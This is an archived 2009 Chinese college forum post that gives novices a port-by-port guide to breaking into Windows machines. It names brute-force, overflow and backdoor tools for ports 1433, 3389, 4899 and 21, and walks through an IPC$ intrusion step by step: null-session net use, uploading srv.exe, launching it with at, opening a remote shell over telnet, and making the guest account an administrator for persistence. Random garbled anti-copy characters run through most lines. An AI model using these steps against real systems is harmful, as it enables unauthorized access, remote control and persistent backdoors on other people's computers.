广西经贸职业技术学院论坛

标题: 各个端口入侵方法 [打印本页]
作者: 月中水    时间: 2009-10-16 03:00
标题: 各个端口入侵方法
来源:hi.baidu
& q7 I3 b; D: \9 P3 H希望对新手入侵有帮助! 0 n. L& j8 T) L) z
  1. 1433端口入侵
  o' i# p+ Y8 I/ f+ F0 y  scanport.exe 查有1433的机器% z3 L0 ]* c+ r) f0 s7 ]& X$ |
  SQLScanPass.exe 进行字典暴破(字典是关键)0 }+ M5 Q# x8 t6 y
  最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
+ I3 ^7 \" ^8 q  nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口7 b8 U6 t' L' T9 e+ u. Q( ~/ [
  (以上反向的,测试成功)! Q- N7 F3 q4 s' C+ Y% H  j
  sqlhelloz.exe 入侵ip 1433 (这个是正向连接)2 \# s. o9 _8 p; Y% D, b; R& g
  2. 4899端口入侵
9 S. @& O9 ~0 a# U, r0 V  用4899过滤器.exe,扫描空口令的机器+ V) [/ b% j+ X  I( g  X6 u
  3. 3899的入侵7 t: C1 P! V- m8 H, P
  对很早的机器,可以试试3389的溢出(win3389ex.exe)
8 z: t, [: t1 [8 \' L$ ?  对2000的机器,可以试试字典暴破。(tscrack.exe)
9 r5 Y1 J# O1 [8 I! [# Q  4. 80入侵
' z  i4 |* o3 h  对sp3以前的机器,可以用webdav入侵;& ~4 N' ]; a8 y' c
  对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)1 ?8 }2 ]# I" x6 m' V7 C
  可以利用SQL进行注入。(啊D的注入软件)。  x7 d3 s0 Y" ?5 Z6 f; x  h
  5. serv-u入侵(21端口)# d. l3 N9 Y; ~! ]# ]1 P
  对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
, I/ W- Y! S7 w& p  对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
8 c9 K. i7 v8 h! \" Z; H  对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)  r" G4 y/ p  ~) g
  输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码9 `8 s3 N( T3 l/ o0 a' V
  6. 554端口0 X2 P# |6 W+ Z+ V7 I  M- V
  用real554.exe入侵。
. E: `3 C+ M. d! z# p0 ]  7. 6129端口4 _( A1 o/ V$ A$ c
  用DameWare6129.exe入侵。4 @0 A: X" T+ O8 h* P6 f: \9 a
  8. 系统漏洞* G* k- O7 c# w$ ~+ {
  利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。
& {9 k. K' T4 q( @9. 3127等端口& B& I$ z: ?$ b) B6 w# F6 @

8 V8 m) O! w/ M, q8 M& V( \; P  可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
5 W3 S& G/ Y) h: o0 w$ |4 \9 U  10. 其他入侵; }" m8 X+ t! q: v
  利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。6 s3 f  {' T) W. r1 R1 `
: H9 g* Z% j( V3 A
                              经典IPC$入侵6 {) X6 X. z5 t, f7 ~
6 I" }( z8 ]2 E% l7 M
  1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"
0 M/ j; C% c0 I' |1 V5 t. q  这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
3 }- N0 o" A+ i4 A0 b$ O  2. C:\>copy srv.exe $">\\127.0.0.1\admin$
4 `& z# {7 H; z2 i, M  先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。1 a$ o1 N. ~1 I5 O& U0 x
  3. C:\>net time file://127.0.0.1/
! a! {( h5 D3 i# j9 g  查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
7 N' x8 J# i4 T) R! P1 V  4. C:\>at file://127.0.0.1/ 11:05 srv.exe9 o0 \' B, g1 M( l1 p
  用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.
! Z% p8 ?! @% B$ F# i  5. C:\>net time file://127.0.0.1/
6 r8 C; w- u" I  再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。+ S2 I0 ?4 f% j1 F  k) R5 g2 v
  6. C:\>telnet 127.0.0.1 991 n4 f8 B# D% N5 [
  这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
5 z* d4 d" Y" m' u4 d  虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
* x7 v, [" X: n' L5 q& \+ m% ?! {  7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$- |9 i2 ^4 [6 z9 p% O1 Y5 C
  用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。2 h5 I% J9 S( k
  8. C:\WINNT\system32>ntlm" A2 }: Z8 {- ?0 U& [% x* Y
  输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
% E0 M% C% n4 h; J8 w  9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组
% b+ `9 I: ?" h) {/ Y! z- |7 \0 Y  10. C:\>net user guest /active:yes
8 H& i  p; u% l6 N% m+ j1 b4 [  将对方的Guest用户激活
& F' {" y  A* H0 v5 A  11. C:\>net user guest 1234. P2 p' j: O+ }" [* W5 m4 Q
  将Guest的密码改为1234,或者你要设定的密码
$ b* X. K9 I5 {; T9 d6 b  12. C:\>net localgroup administrators guest /add
4 ~( i# D* {" L/ ]& y  将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)



欢迎光临 广西经贸职业技术学院论坛 (http://www.gxjmbbs.com/) Powered by Discuz! X3.2